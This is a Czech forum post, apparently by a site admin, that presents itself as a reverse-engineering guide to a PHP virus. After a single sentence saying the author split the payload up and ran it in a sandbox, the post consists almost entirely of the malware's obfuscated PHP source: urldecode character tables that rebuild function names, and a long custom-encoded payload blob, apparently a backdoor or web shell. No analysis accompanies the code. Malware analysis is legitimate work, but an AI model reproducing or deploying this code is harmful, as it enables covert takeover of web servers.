Jump to content
Search In
  • More options...
Find results that contain...
Find results in...
ffredyk

návod [PHP] Reverse engineering viru

Recommended Posts

Admin
Author of the topic Odesláno:

Nedalo mi to spát a ještě jsem se podíval na eval druhého base64 enkryptu. Také je to zajímavé maskování celého payloadu, rozlámal jsem to na kousky a hodil do sandboxu

<?php

$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};
$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};
$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};
$OO0000=$O00OO0{7}.$O00OO0{13};
$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};

//2nd enkrypt
$O0O000="TSuJwhrpBvmnAVGKLOcWNjQiXylUCtgsFZEPYoDqaMkHxzfdebRIxhapFXMTSybtuwOnCzNBAdKIockQYjlLViDsPefmgGvRqrHWZUEJsf9FgRulfKevgbETNIu9JYNtzF0npOX0WRSHW2wIJf0lp2X0WRutzF0ngBPegoAHgRE0NRGenhk7fKelpOX0WRulshutgRE0NRGtzF0nHBwLN2w7fKelpOX0WRulshutgRE0NYN7fKT9fKevN211NbkHWO1FJf0lN21cioV1ioA0o3wcghlTzF0ngBPepRAjWopTo3EjNf09pcNTZF0nJYulJYErUowcgw90Uou9pc8tzF0nHK0npRGlshutPINap2VrixPtCIN0o2QtCIWaP29vihN7fKevN211NbvlshuvNclvN211NbkHWO1FnxLAYbi1UbA0gB9aJRAjNbwqWBwrWV91NbvenoLAYIulJYSTiIuegoArioKepV9xEwpBEwpUp1pVQwwVQ1EHwwppp10TnoLAYIulJYulJYulpRAjWopTJf0lpV9xEwpBEwpUp1pVQwwVQ1EHwwppp107fKelJYulHBwLN2w7fKelJYulJYulJOkbnOkrN2w0nYEHQ0whwvwhBcWXNbW2p10TnoLAYIulJYulJYulJYulJYErUowcghu9JYEHQ0whwvwhBcWKhVSHQ0wGEIWWJY4lpr8tJY4lpV9xEwpBEwpUp2Vci3PtowLFoxLAYIulJYulJYulHBwLN2w7fKelJYulJYulJYulJYuvN211Nbvlshuvo1AVQkiVQkLtQDXKo1AVxDPtohuaJYN/pcuaJYEHQ0whwvwhBcWEwQwhBw9xwVppxvNtoxLAYIulJYulJYulHK0nJYulJR0AYIulJYScioE1Nb4lpRAjWopTzF0nHK0npOWyW2wIJf0lp2E0gOkcWRvjiBktgRKcCtATi2iyZOiyWB5vPoETU25tCtAeU3utzF0npRSXN3A3U3pvJf0lUBK1nO1vAhXupV9REwEUp3Svp10TnxLAYbkbJYlvNOVrN3WyNbKlsx0lprwbPbPrAbP2PdDFArSXiBG2ABPFGOAIzOQrABG5P2G0pcvlZF0nJYulJYEXiOEHP29aWOwaWYu9JDuvo0WVwVLtUBVFUbVjihWWzF0nJYulJYEXP3ETU24lshSupV9REwEUp2VdWOkyUIWWzF0nJYulJYEvU21XgB4lshSupV9REwEUp2EyUBVTUIWWzF0nJYulJOkbnYEvU21XgB4TZF0nJYulJYulJYuvgO9rWYu9JYEvU21XgB47fKelJYulHBwLN2w7fKelJYulJYulJYEeU3A0Jf0lpV9xEwpBEwpUp0XQwVSHhD9xwYWWzF0nJYulJR0AYIulJYuyCcEeU3A0Jf0lpV9xEwpBEwpUp0XQwVSHhD9xwYWWzF0nJYulJYEFPoEeJf0liOkcUbVjihXHo0ipxDwHocv7fKelJYulgBPepOVdWOkyUd09p3STUbNtnoLAYIulJYulJYulCc9eWREFNreyC3W3Wc5tU29tUOQaP29jC3STUbN/N2k0iB1XNf1eWREFNreyC2w4PB1FUOQaP29jC3ATWOwjPouaZO1LfKelJYulJYulJOkbnRA0NtA0NIlvPBEvo2AyUtEkUtKLpc54UBFtnhk7fKelJYulJYulJYulJYSTiIXTN19eWREFNclTnoLAYIulJYulJYulJYulJYulJYuviOV0Pw9aioNlshutgRE0NRG6Cc93W3Nai29yi2qkCbAyUh9FgB5ts3ATWOwjPou9pc4tgRE0NRG6Cc8tCIEeU3A0CINypc4vPBEvo2AyUtEkUtK7fKelJYulJYulJYulJYS9iBqrioLAYIulJYulJYulJYulJYulJYuviOV0Pw9aioNlshutgRE0NRG6Cc93W3Nai29yi2qkCbAyUh9FgB5ts3ATWOwjPou9pc4tgRE0NfeyCcNapOXyN3Kapc8tCIEXiOEHP29aWOwaWfLAYIulJYulJYulJYulJR0AYIulJYulJYulJYulJY8yQ2k0iB1XNfelgRE0NfeyC3W3Wc5tWBEXUbWriBXXWY5dU20yUBVFgB5violaZO1LfKelJYulJYulJYulJYSTiIXrWRpTN3EcnRAjU3w0iO8epOEXWOVHUbw3nhFti29yi2qkpcvTZF0nJYulJYulJYulJYulJYulJOwdgO8lprqINd5ygrqINd4tzF0nJYulJYulJYulJYulHBwLN2w7fKelJYulJYulJYulJYulJYuliBAeUcuviOV0Pw9aioNaprqINd5FgB5tJOiXURAkJxqINd4tzF0nJYulJYulJYulJYulHK0nJYulJYulJYS9iBqrioLAYIulJYulJYulJYulJOwdgO8lprqINd5rgoEkUBVFJO5XUBQlibVLN2QXsOpcsIN7fKelJYulJYulJR0AYIulJYulJYulioXTWfLAYIulJYS9fKeAYIulJYuvibkLiw9FPoEeJf0lpRSXWOlapc9cU2pyWRGaWRX0prLAYIulJYSTiIlXpOVdWOkyUIk7fKelJYulJYulJYEXP3ETU24lshutNRw0prLAYIulJYS9fKelJYulgBPepOVdWOkyUIu9shutNRw0pck7fKelJYulJYulJOkbnRA0NtA0NIlvPBEvo2AyUtEkUtKLpc54UBFtnhk7fKelJYulJYulJYulJYSTiIXbgBqko2w4goA0NclvibkLiw9FPoEenhk7fKelJYulJYulJYulJYulJYulpOEXWODlshSrUB91WOEynYEbgBqko3SXWOlTzF0nJYulJYulJYulJYulHBwLN2w7fKelJYulJYulJYulJYulJYulpOEXWODlshutwoAkNI1Xi2waWfelnl0nKBqLU3N6JY8tzF0nJYulJYulJYulJYulHK0nJYulJYulJYulJYulgBPeN3EcN3EcnYEvPoEXCYNypc4vPBEvo2AyUtEkUtKTnoLAYIulJYulJYulJYulJYulJYSkP2XyJYN8PtJ+N2k0iB1XNYSXURpkPBE5JOVviOwvJxqINd4tzF0nJYulJYulJYulJYulHBwLN2w7fKelJYulJYulJYulJYulJYulgBPegoAHgRE0NRGenhk7fKelJYulJYulJYulJYulJYulJYulJYEvPoEXo25kWcu9JREcgB0epOEXWODTCIpNNkqaJI4tQ2k0iB1XNfelgRE0NRG6Cc8tCIEeU3A0CINypc4vPBEvo2AyUtEkUtK7fKelJYulJYulJYulJYulJYulHBwLN2w7fKelJYulJYulJYulJYulJYulJYulJYEvPoEXo25kWcu9JREcgB0epOEXWODTCIpNNkqaJI4tQ2k0iB1XNfelgRE0NfeyCcNapOXyN3Kapc8tCIEXiOEHP29aWOwaWfLAYIulJYulJYulJYulJYulJYS9fKelJYulJYulJYulJYulJYulCc9xgoEkUBVFzISeWREFzI8yW3W3CbW1iOVai3AkgOV0CbAyUh9jPoSTUbEkZY54UBFAYIulJYulJYulJYulJYulJYSTiIXbgBqko3S1WV9dU250iB50NclvibkLiw9FPoEeCYEvPoEXo25kWcvTJRLAYIulJYulJYulJYulJYulJYulJYuliBAeUcutsOpcsb9MsOpcsIN7fKelJYulJYulJYulJYulJYulHBwLN2w7fKelJYulJYulJYulJYulJYulJYulJOwdgO8lprqINd5bgBqkJRWcgoEkJOiXURAkJxqINd4tzF0nJYulJYulJYulJYulJYulJR0AYIulJYulJYulJYulJR0AYIulJYulJYulHBwLN2w7fKelJYulJYulJYulJYSkP2XyJYN8PtJ+N2k0iB1XNYSaPB1kJOiXURAkJxqINd4tzF0nJYulJYulJYS9fKelJYulJYulJOkbJYXrWRprWRJepOVviV9dU250iB50CYutCtSeNYNTnhS7fKepYKvvPhu9JO1vAhXjifQeKYEHE0wQBcWXp10TnxLAYlvpYhEIJf0lUBK1nO1vAhXupV9REwEUp2JtohvTzF0nYKvpgBPepOD9soAjU3w0iO8ep2X0WRu6Cc8tCIEtU3WkPI4tC2DaNOXFpcvlHRFlpOJ9shNcGBG0ifurGBEvGdv5GfDrAxiXzxVIG2wbP2AXGfDrGYNTZF0nYKvpYhErUoA0NIu9JDuvo0WVwVLtN21rWRJtoxLAYlvpYKkTiIXbgBqko3S1WV9dU250iB50NclvNOV0gYuaJYNypcuaJYEXiOEHP29aWOwaWYFlpRAjN3Ecnhk7fKepYKvpYBwdgO8lp29MprLAYlvpYKk9fKepYKk9fKelJYulJYulJR0AYIulJYS9fKelJYulgBPepOVdWOkyUIu9shutiOwLpck7fKelJYulJYulJOkbnOiTUOwHioXTN3ErnYEbgBqko3SXWOlTnoLAYIulJYulJYulJYulJYEvPoEXJf0lN21yWoEvUclvibkLiw9FPoEenxLAYIulJYulJYulHBwLN2w7fKelJYulJYulJYulJYuviOV0Phu9JYNtzF0nJYulJYulJYS9fKelJYulJYulJOkbnRA0NtA0NIlviOV0PhFtCcNapOVviV9dU250iB50nhk7fKelJYulJYulJYulJYSTiIXTN19eWREFNclTnoLAYIulJYulJYulJYulJYulJYuviOV0Pw9aioNlshS0NbkjnYEvPoEXnh4IoRpNUIJap1ATWOwjPou6JOX0WRSrzI8ypc4vgO9rWY4tCcNapOVviV9dU250iB50zF0nJYulJYulJYulJYulHBwLN2w7fKelJYulJYulJYulJYulJYulpOEXWOVHUbw3Jf0lWRpTUhlviOV0PhvaJkqcoO4ICIWxgoEkUBVFzISeWREFzI8ypc4vgO9rWY4tCcNapOVviV9dU250iB50zF0nJYulJYulJYulJYulHK0nJYulJYulJYulJYulgBPeibkLiw9FWoEHP29aWOwaWRGepOiTUOwHNOV0gYFviOV0Pw9aioNTnhS7fKelJYulJYulJYulJYulJYuliBAeUcutsOpcsb9MsOpcsIN7fKelJYulJYulJYulJYS9iBqrioLAYIulJYulJYulJYulJYulJYSkP2XyJYN8PtJ+ibkLihS3Nbk0ihSbPBqrihD8PtJ+prLAYIulJYulJYulJYulJR0AYIulJYulJYulHBwLN2w7fKelJYulJYulJYulJYSkP2XyJYN8PtJ+N2k0iB1XNYSvU2wrJO5yWYSkZOkrWYD8PtJ+prLAYIulJYulJYulHK0nJYulJR0AYl0nJYulJOw4goK7fKT9fKTbWB5dWOkyUISTN19eWREFNclTJRLAYIulJYSTiIueJYVkUoS0Zhlvo1AVQkiVQkLthVEQQVGtohvlpIPlN3EcWO9LU3WkNIlvo1AVQkiVQkLthVEQQVGtohvlJx09JYWyibPtnhS7fKelJYulJYulJRpkWRwcUIS0NtwkzF0nJYulJR0liBqriBkbJYllgoArioKepV9xEwpBEwpUp0XQwVSHBV9Ox1poKwpDEQEHQVpswD8tohvlpIPlpV9xEwpBEwpUp0XQwVSHBV9Ox1poKwpDEQEHQVpswD8tohu9sx0lp2X0WRSrpcuTJRLAYIulJYulJYulNbw0WopaJREcWBQ7fKelJYulHhSkURAkgBPlnYuXiB1FWRvepV9xEwpBEwpUp0XQwVSHEkpsxkEHEQ5Do0XQwVSxp10TJYPbJRA0NtEyUO93ioJepV9xEwpBEwpUp0XQwVSHEkpsxkEHEQ5Do0XQwVSxp10TJYD9shutU2ibpcvlZF0nJYulJYulJYScioE1Nb4lWRp1ixLAYIulJYS9fKelJYulNbw0WopaJOiXURAkzF0nHK0npREkUoulshSupV9REwEUp3AjWOwjNYWWzF0npOkvJf0lKYEHE0wQBcWrUBkvp107fKevN2k0ihu9JDuvo0WVwVLtN21rgoEkp107fKevNOVtihu9JDuvo0WVwVLtN21FPBWkp107fKevN2k0ihu9JRA0Nk9cioSLPBAknYNypcFtpcFvN2k0ihv7fKevgO9rWYu9JYEHQ0whwvwhBcWJwVEKo0XsQ1KtoxLAYIEdUO9dgcu9JYNtzF0nfKevWOwjNRWkPIu9JDuvo0WVwVLtWOwjNRWkPIWWzF0npREkUoS3iBJlshSrWRpHNbwFUOVdihltCcNLpcNLpREkUoS3iBJTzF0nfKTTiIlvWOwjNRWkPIk7fKelJYulpRATWOQlshuvWOwjNRWkPkLFoh4vWOwjNRWkPkLqoh4vWOwjNRWkPkLcoxLAYIulJYuvWOwjNYu9JRA1PtA0NIlvWOwjNRWkPIFrnxLAYt0AYIELPB5tJf0lpV9xEwpBEwpUJvXQwVSHKQAfEwSQo0qSxvWwKQWVJk07fKevUOVaicu9JYErnYELPB5tnxLAYIEyNcu9JYEHQ0whwvwhBcWJwVEKo1wxEwpHKQWVxkKtoxLAYIEyNcu9JYErnYEyNcv7fKTTiIXTN3AkWYlvo1AVQkiVQkLthVEQQV9hEQiVQvwhp10TnoLAYIulJYuvWopLN2XXUbNlshuvo1AVQkiVQkLthVEQQV9hEQiVQvwhp107fKelJYulpRwcURAePB5tJf0lpRGepRwcURAePB5tnxLAYt1kURAkZF0nJYulJYE1NbqrgOVaicu9JYNtzF0nHK0nfKTTiIXtioEkUtPep1pVxQ9QEw9SEDEhpcvlpIPlN3EcP2VriBAjNYXtioEkUtPep1pVxQ9QEw9SEDEhpcvLJYW1UbjaU3WapcvTJRLAYIulJYuvP2qyP2LlshStioEkUtPep1pVxQ9QEw9SEDEhpcv7fKT9JOwLN2wTiIXTN3AkWYlvo1AVQkiVQkLtQvwAx1EVo0VDEVJtohvlpIPlpV9xEwpBEwpUp1pVxQ9QEw9SEDEhp10lpIPlN3EcP2VriBAjNYlvo1AVQkiVQkLtQvwAx1EVo0VDEVJtohFlp3wag25yW24tnhvlZF0nJYulJYEdUO9dgcu9JYEHQ0whwvwhBcWhEQ1swDwHKQEDQIWWzF0nHK0nfKevgRE0NV9dUO9dgcu9JYNtzF0ngBPei2w0iB52nYWJwVEKo0AGhQwzwV9pQYNTJYPbJRA0NbAXN2wdUouei2w0iB52nYWJwVEKo0AGhQwzwV9pQYNTCYutWB5MUb93UINTnhS7fKelJYulpOX0WRSHP2qyP2LlshStioEkUtPep0XQwVSHK0qpEQ5Qo0kKpcv7fKT9JOwLN2wTiIXtioEkUtPep0XQwVSHBV9Ox1poKwpDEQEHEv9hpcvlpIPlN3EcP2VriBAjNYXtioEkUtPep0XQwVSHBV9Ox1poKwpDEQEHEv9hpcvLJYW1UbjaU3WapcvTJRLAYIulJYuvgRE0NV9dUO9dgcu9JOWkWOwaWIlthVEQQV9Po0isQkWSQvEVEV9Ox1JtnxLAYt0AYl0ngBPeN3EcgoA0NIlvP2qyP2LLpcFtnhk7fKelJYulpOALU2AMo3EjNYu9JOw4NOqyiOQeJIFICYEdUO9dgcv7fKelJYulpOALU2AMJf0lpOALU2AMo3EjNVLFoxLAYt0AYl0ngBPeJBkrN2w0nYErgoEkUBVFo2iTUOQTJRq8JDuvN2k0iB1XNV9bgBqksx0tpck7fKelJYulpRATWOwjPoSHibkLihu9JYWrgoEkUBVFprLAYt0AYbkbnYVTN3AkWYlvUBVFUtwjnhS8HYSupO1XNO51Ux09pcNTZF0nJYulJYErgoEkUBVFo2iTUOQlshucGfuFzF0nHK0nfKeAYbkbnRSciBWHUBV0P2lepc9Zpc4IoY8ICIErgoEkUBVFo2iTUOQapcXHBrDjAw0Tsc54UBFvC2vtCYErUowcgw90UouLpRwcgBVcNIvTZF0nJYulJDSeiBVvioJeJvAyUtEkUtKjWRkFixelWOw4WY94UBFInxLAYIulJYSTiIXTN3AkWYlvWopTPopcBrVWnhk7fKelJYulJYulJYETiYu9JRA0Nk9cioSLPBAknYWHpcFtpcFvWopTPopcBrVWnxLAYIulJYS9iBqrioLAYIulJYulJYulpOkvJf0lGxuFzF0nJYulJR0AYIulJYuvgoijPoSTiYu9Jfu7fKelJYulN2k0iB1XNV9yWoKeZk9rgoEkUBVFnYEtU3WkPIFvgBKLpOXyN3KLpOE0CYETWb1XNOkvCYEjPoSaWB0LpOX0WRSHW2wInhFvgO9rWYv7fKelJYulioXTWYlTzF0nHK0nitwaP3ETU24lZk9rgoEkUBVFnYEtU3WkPIFvgBKLpOXyN3KLpOE0CYEjPoS0ZoSkCYEjPoSHUtwjCYEeWREFo3WkPd0tgRE0NYNLpOiTUOw0ZoSksxuLpO1XNV9rNOqTWRAHUtwjshNtCYE0iB1FshNtCYEvPoEXxbw3shNtnoLAYIulJYuvW2wIJf0lpOX0WRSHW2wICIN6Cc8tCIEtU3WkPI4tC3ATWOwjPoSvWO4aNOXFs2EXWOQ9pc4vgBKapci0iB1FshNapREkUouapci3iBJ9pc4vgO9rWY4tptXjUf0tCIEvWY4tpb1XNRE5NOQ9pc4vUBVFWRkFih4tpbiTUOw0ZoSkshNapOiTUOw0ZoSkCINbUBVFo3AFUOk0N19aWB09pc4vUBVFo3AFUOk0N19aWB0apcijPoSHUtwjshNapO1XNV9aWB0apcivPoEXxbw3shNapOEXWOVzioN7fKelJYulNbw0WopaJREcgB0eN21yWoEvUclvW2wInhv7fKT9fKTbWB5dWOkyUISrgoEkUBVFo291WYlvWopLCYEeU3A0noLAYIulJYSTiIXTN19eWREFNclTnoLAYIulJYulJYulpOX0WRulshutgRE0NRGtzF0nJYulJR1kURAkZF0nJYulJYulJYuvgRE0NYu9JYWeWREFprLAYIulJYS9fKelJYulpOEXWOwHN3EcJf0lJOEXWOQeJkvjUh1voVEJzbv6N1uICRETUBQenhv7fKelJYulpRATWOwjPoSHgOwXiOwcJf0lprF/ZO1LJRikNtATU249JdDaGYJliB5dU2ETUbN9JkwQEI04Jd8+fKe8WopLN2w0fKelJYulJYS4UBqaNr0IgRE0NfeyC3W3Wc5rgoEkUBVFNc5yNbNyN2AeiB1XNc9rgoEkUBVFCruazhJAYIulJYulJRXjUO5rztXrgx0IgRE0NfeyC3W3Wc53Gc5yNbNyGduFGh9PxQqxP2XkUBDjgB5rWOVaP2QIfKelJYulJYS4N2v6N2AeiB1XxO9dPoETU249JbX0WRu6Cc93W3NaN2k0iB1XNRGaU3ptC3AdgOwjPoGyN2k0iB1XNY8FCdvAYIulJYulJYulJYulJOX0WRu6Cc93W3NaN2k0iB1XNRGaU3ptC3AdgOwjPoGyN2k0iB1XNY8FCdvyN2k0iB1XNY54N2KIsIN7fKelJYulpRATWOwjPoSHgOwXiOwcJY49JYNAYIulsRwcUf4AYIulJYu8UO9dsINapOX0WRuapreyCcNlCIuvgO9rWYuaJYJyJIuaJYN8C2qyPr4AYIulJYu8UOVrWO1yif4tJY4lpOEXWOwHN3EcJY4lprFyUOVrWO1yif4AYIulJYu8P2XXUbWkitpkNx5vPBkLZxFyP2XXUbWkitpkNx4AYIulJYu8NRpTU3pTWRv+GY4qsY9FNbkyNbk0Zx4AYIulsY91NbF+prLAYIulJYuvWopLo2VcNIu9JOw4NOqyiOQeJkqcoO4ICYE1NbFTzF0nJYulJYEjPoSHN3EcJf0lpRATWOwjPoSHgOwXiOwczF0nJYulJOiyNbwXP2lepRwcUV9XNtJlPoGlpRiXURwknoLAYIulJYulJYulpO1XNV9rWRJlCd0lpF0nJYu8WopLsl0nJYulJfqLU2G+pc4vgRE0NY4tzI8ypcuaJYEeU3A0JY4lJI8IJY4vWbVLWBQlCIN8C2qyPr4AYIulJYu8UOVrWO1yif4tJY4lpOEXWOwHN3EcJY4lprFyUOVrWO1yif4AYIulJYu8P2XXUbWkitpkNx5vPBkLZxFyP2XXUbWkitpkNx4AYIulJYu8NRpTU3pTWRv+GY4qsY9FNbkyNbk0Zx4AYIulsY91NbF+prLAYIulJYS9fKelJYuliBAeUcuvUBVFo3A0NI4IfKe8C3wcURAkWf4IzF0nHK0nfKeAYl0ngBPeN3EcgoA0NIlvN211NbkHWO1FCYNaP3ArpcvTZF0nJYulJYE3iBJlshuvgRE0NV93iBJapreyCcNapOWyW2wICINygB5violaNOXFs3wcUf0tCIErgoEkCINbgBK9pc4vgBKapci0iB1FshNapREkUouapcivWf0tCIEvWY4tptWkPd0tCIEeU3A0CINbZte9pc5rUBkrPb90nYvapcimiOkcshNapOTvgoJapcidUO9dgr0tCIEdUO9dgc4tptwcgx0tCIErUowcgh4tpbqXUbN9pc4vUOVaic4tpb9rshNapO9rCINbWopLN2XXUbN9pc4vWopLN2XXUbNapcieWREFo2ALU2AMshNapOX0WRSHP2qyP2L7fKelJYulpOX0UBqHP29aWOwaWYu9JREcgB0eN21yWoEvUclvW2wInhv7fKelJYulgBPeJoA0NtA0NIlvgREjUV9dU250iB50CYWaU2pyWRwriopXi2waWYNTnoLAYIulJYulJYulgBPeN3EcN3EcnYEeWO1Lo2AyUtEkUtKLp29MgREjUOWkWOAyUtEkUtKtnhk7fKelJYulJYulJYulJYSugOwXiOwcnYpfU250iB50CoE5NOQ6JREkZRKyP3ArzcSdgOVcN2w0sow0iI04JIv7fKelJYulJYulJYulJYuvgREjUV9dU250iB50Jf0lN3Eco3pkNOqXP2QeJb9MgREjUOWkWOAyUtEkUtKICYNtCYEeWO1Lo2AyUtEkUtKTzF0nJYulJYulJYulJYuliBAeUcuvgREjUV9dU250iB50zF0nJYulJYulJYulJYulioXTWYlTzF0nJYulJYulJYS9iBqrihSTiIXrWRprWRJepOX0UBqHP29aWOwaWYFti2w0P29aWOwaWfQFGRSXi2Qtnhk7fKelJYulJYulJYulJYSugOwXiOwcnYWJwVEKCrDaGhu1GfulhB50iopaPBFlQ2wcWbwcJDwcNb9cpcv7fKelJYulJYulJYulJYSkZOk0nYv7fKelJYulJYulJR1kURAkJOkbnRA0NtA0NIlvgREjUV9dU250iB50CYWtioEdU250iB50Afu0NOVtihNTnoLAYIulJYulJYulJYulJDSeiBVvioJep0XQwVuyGh4qJfKFAYSzU3KlEb91UbKtnxLAYIulJYulJYulJYulJOw4goKenxLAYIulJYulJYulHK0nJYulJR0AYt0AYl0niBqrihSTiIlvN2k0ihk7fKelJYulgBPepRATWOQlsx0lp3XjUYNTZF0nJYulJYulJYSugOwXiOwcnYpfU250iB50CoE5NOQ6JREkZRKygREjUfLlP2XXNtAkWf11WOPjzYJTzF0nJYulJYulJYuvUBVFiOkcJf0lKYEHE0wQBcWjPoSvgoJtoxLAYIulJYulJYulpO1XNRE5NOQlshSupV9REwEUp21XNRE5NOQtoxLAYIulJYulJYulpOiTUOw0ZoSkJf0lKYEHE0wQBcWbgBqkWRkFihWWzF0nJYulJYulJYuvUBVFo3AFUOk0N19aWB0lshSupV9REwEUp21XNV9rNOqTWRAHUtwjp107fKelJYulJYulJYEjPoSHUtwjJf0lKYEHE0wQBcWjPoSHUtwjp107fKelJYulJYulJYEvPoEXxbw3Jf0lKYEHE0wQBcWvPoEXxbw3p107fKelJYulJYulJOkbnYEjPoSvgoJTZF0nJYulJYulJYulJYulgBPeJBkro2ETNIlvUBVFiOkcnhk7fKelJYulJYulJYulJYulJYulKO1MiOkcnYEjPoSvgoJLGfN3Acq0NtwknxLAYIulJYulJYulJYulJYulJYSkP2XyJYWygcutCIEjPoSvgoJapcSrWBAdioArJxqINd4tzF0nJYulJYulJYulJYulHBwLN2w7fKelJYulJYulJYulJYulJYuliBAeUcuvUBVFiOkcCINlPBqciBVvZhSkZOkrWYD8PtJ+prLAYIulJYulJYulJYulJR0AYIulJYulJYulHK0nJYulJYulJYSTiIXupV9REwEUp21XNOkaiOw4p10TZF0nJYulJYulJYulJYulpOiTUOwXNtpXZhu9JOqTN3EDgoJepO1XNOETNIv7fKelJYulJYulJYulJYSTiIXdU3waWYlvibkLiBVcNbV5nx49GIk7fKelJYulJYulJYulJYulJYulpO1XNOkaiOw4o3A0NIu9JYNtzF0nJYulJYulJYulJYulJYulJYEjPoSTUbEkZV9rWRJlshutsf94UBFlWbwcN2kyUd0IGh4FJISkUbAyiOkair0IwwEOCxlIsr4AYdqrgoEkUBVFgB5viollZO1LUtG9JbX0WRu6Cc93W3Nai29yi2qkCbAyUh9rP2XkUBVrC3ATWOwjPouyGY44AYJ+prLAYIulJYulJYulJYulJYulJYSbU3pkPBAenYEbgBqkPopcPovlPoGlpRiXURwknoLAYIulJYulJYulJYulJYulJYulJYulgBPeN3EcgoA0NIlvWbVLWBQLpc54UBFtnhk7fKelJYulJYulJYulJYulJYulJYulJYulJYuvUBVFgB5vioXHN3EcJY49JYNAYIulsRATWOwjPou+fKelJYulsOqyPr4tCIpeWREFzI8yJI4vo1AVQkiVQkLthVEQQV9Jx1AQp10aJI8ICIEjPoSvgoJapc8tCIE2PBq1ih4tsY9LU2G+fKelJfFyN2k0iB1XNf4tzF0nJYulJYulJYulJYulJYulJYulJYS9fKelJYulJYulJYulJYulJYulHK0nJYulJYulJYulJYulJYulJYEjPoSTUbEkZV9rWRJlCd0lpF0nsY9rgoEkUBVFgB5viol+prLAYIulJYulJYulJYulJYulJYuvZO1LUbVjihu9JDuvo0WVwVLtUBVFgB5violtoh4tCtXjUYN7fKelJYulJYulJYulJYulJYulpO15ibkLihu9JOiyNOwanYE4UBqaPB1kCYuIWcJTzF0nJYulJYulJYulJYulJYulJOi3Nbk0ihlvUokbgBqkCYuvUBVFgB5vioXHN3EcnxLAYIulJYulJYulJYulJYulJYSbP2qyN2QepO15ibkLihv7fKelJYulJYulJYulJYulJYuliBAeUcuIU2L8PtJ+gRE0NfeyCcJapV9xEwpBEwpUp0XQwVSHhD9xwYWWCIJyJI4vZO1LUbVjixLAYIulJYulJYulJYulJYulJYuyC2wdgO8lJdqINd4ICIE3iBJ7fKelJYulJYulJYulJYulJYulioXTWfLAYIulJYulJYulJYulJR1kURAkZF0nJYulJYulJYulJYulJYulJOwdgO8lp3XjUYSbgBqkJOqkN3GlUtwjPbwcJO1XNOkaiOw4JOiXgBqkJhN7fKelJYulJYulJYulJYulJYulioXTWfLAYIulJYulJYulJYulJR0AYIulJYulJYulHK0nJYulJYulJYuvW2wIJf0lpOX0WRSHW2wICIN6Cc8tCIEtU3WkPI4tC3ATWOwjPouaNOXFs2EXWOQ9pc4vgBKapci0iB1FshNapREkUouapci3iBJ9pc4vgO9rWY4tptXjUf0tCIEvWY4tpb1XNRE5NOQ9pc4vUBVFWRkFih4tpbiTUOw0ZoSkshNapOiTUOw0ZoSkCINbUBVFo3AFUOk0N19aWB09pc4vUBVFo3AFUOk0N19aWB0apcijPoSHUtwjshNapO1XNV9aWB0apcivPoEXxbw3shNapOEXWOVzioNapci1Nbv9pc4vN211NbvapcieWREFshNapOX0WRu7fKelJYulJYulJOkbnRA1PtA0NIlvWOwjNYFFCflTsx0tN2XkUOq4UBFtnoLAYIulJYulJYulJYulJYE4UBqaPB1kJf0lN3wIN3EcnYE0iB1FCflTCINaZO1LprLAYIulJYulJYulHK0nJYulJYulJYSTiIXrWBprWRJepREkUouLGYF3nx09p2XXP2j4UBFtnoLAYIulJYulJYulJYulJOkbnRA1PtA0NIlvWOwjNYF3nhk7fKelJYulJYulJYulJYulJYulpRXjUO5XUBQlshSrWBprWRJepREkUouLAcvapc54UBFtzF0nJYulJYulJYulJYulHK0nJYulJYulJYS9fKelJYulJYulJOkbnDuvo0WVwVLtUBVFiOkcp10TZF0nJYulJYulJYulJYulgBPepOiTUOw0ZoSksx0qnoLAYIulJYulJYulJYulJYulJYuvZO1LUbVjihu9JYE4UBqaPB1kCINai3etzF0nJYulJYulJYulJYulHBwLN2QlgBPepOiTUOw0ZoSksx0cnoLAYIulJYulJYulJYulJYulJYSTiIXbWB5dWOkyUk9kZOkrWRGep2W6U3SkUINTnhS7fKelJYulJYulJYulJYulJYulJYulJYE4UBqaPB1kJf0lpRXjUO5XUBQapc5tZIN7fKelJYulJYulJYulJYulJYulJYulJOkbnYEbNYu9JOW6U3SkUIlvUBVFiOkcCINypc4vZO1LUbVjihFlp3N5pcvTZF0nJYulJYulJYulJYulJYulJYulJYulJYulpRXjUYu9JREcgB0eN21yWoEvUclvW2wInhv7fKelJYulJYulJYulJYulJYulJYulJYulJYSTiIXrWRpTN3EcnYE4UBFLp25yJOAciBV0JO1XNYNTnoLAYIulJYulJYulJYulJYulJYulJYulJYulJYulJYSkP2XyJYN8ib9aWYSrWRkLix0IP29LU3J6NbwvJd5aUcSdNbwXWYSjPouXsY9bU250sIN7fKelJYulJYulJYulJYulJYulJYulJYulJYulJYulioXTWfLAYIulJYulJYulJYulJYulJYulJYulJYulJR0AYIulJYulJYulJYulJYulJYulJYulJYulJYEbNYu9JOW6U3SkUIuepO1XNOETNI4tCcNapRXjUO5XUBQLJYW3zhNTzF0nJYulJYulJYulJYulJYulJYulJYulJYuli3T3Nbk0ihuepOiFCYuvZO1LnxLAYIulJYulJYulJYulJYulJYulJYulJYulJOW6P2qyN2QepOiFnxLAYIulJYulJYulJYulJYulJYulJYulJYulJOwdgO8lJb9MsOpcsIJapOX0WRuaJdeyCcJapV9xEwpBEwpUp0XQwVSHhD9xwYWWCIJyJI4vUBVFiOkcCINypc4vZO1LUbVjixLAYIulJYulJYulJYulJYulJYulJYulJYulJOwdgO8lJdqINd4ICIE3iBJ7fKelJYulJYulJYulJYulJYulJYulJYulJYSkZOk0nYv7fKelJYulJYulJYulJYulJYulJYulJR1kURAkZF0nJYulJYulJYulJYulJYulJYulJYulJYuli3TdUO9rihlvituTzF0nJYulJYulJYulJYulJYulJYulJYulJYuliBAeUcutsOiyUtKlN3E5UOQ9JbAyUO9cztpkiYJ+P3pkPoKlN2k0iB1XNYSbPBkLihSzUcSKiopjgoArgB9aNcD8C2iyUtK+sOpcsbX0WRu6Cc8tCIEHQ0whwvwhBcWJwVEKo0XsQ1Ktoh4ICcJapO1XNOETNI4tCcNapRXjUO5XUBQ7fKelJYulJYulJYulJYulJYulJYulJYulJYSkP2XyJYJ8PtJ+JI4v